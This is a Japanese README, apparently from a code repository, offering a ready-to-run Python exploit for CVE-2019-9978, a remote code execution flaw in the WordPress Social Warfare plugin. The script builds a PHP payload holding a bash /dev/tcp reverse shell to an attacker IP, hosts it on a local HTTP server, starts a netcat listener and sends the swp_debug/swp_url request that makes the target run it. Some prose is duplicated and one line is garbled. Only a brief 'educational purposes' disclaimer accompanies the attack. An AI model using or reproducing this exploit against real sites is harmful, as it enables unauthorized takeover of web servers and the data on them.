
`admin-post.php` の `swp_debug` パラメータにより、リモート攻撃者は悪意のある PHP コードを含む外部ファイルをインクルードでき、そのコードはサーバー上で評価されます。リバースシェルペイロードをホストする細工された URL を指定することで、攻撃者はコマンド実行を達成できます。
このリポジトリには、WordPress 用 Social Warfare プラグイン(バージョン 3.5.2 以下)のリモートコード実行(RCE)脆弱性である CVE-2019-9978 を利用する、動作する Python エクスプロイトが含まれています。
admin-post.php 内の swp_debug パラメータにより、リモート攻撃者は悪意のある PHP コードを含む外部ファイルを取り込むことができ、そのコードはサーバー上で評価されます。リバースシェルペイロードをホストする細工された URL を供給することで、攻撃者はコマンド実行を達成できます。
swp_url パラメータを送信して RCE を引き起こします。example.com をターゲット IP にマッピング)#!/usr/bin/env python3
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time
# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130" # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4447
PAYLOAD_FILE = "payload.txt"
def create_payload():
"""Write exact reverse shell payload using valid PHP syntax"""
payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
with open(PAYLOAD_FILE, "w") as f:
f.write(payload)
print(f"[+] Payload written to {PAYLOAD_FILE}")
def start_http_server():
"""Serve payload over HTTP"""
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
print(f"[+] HTTP server running at port {HTTP_PORT}")
httpd.serve_forever()
def start_listener():
"""Start Netcat listener"""
print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
def send_exploit():
"""Trigger the exploit with vulnerable parameter"""
payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
print(f"[+] Sending exploit: {exploit}")
try:
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
pass
def main():
create_payload()
# Start web server in background
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
time.sleep(2) # Give server time to start
# Start listener in background
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)
# Send the malicious request
send_exploit()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("[-] Interrupted by user.")
ATTACKER_IP と LISTEN_PORT を、自分のマシンの IP と希望するポートに更新します。example.com を正しい IP に解決することを確認します。python3 exploit.py
このエクスプロイトは教育目的のみで提供されています。所有していないシステムでは、明示的な許可なく使用しないでください。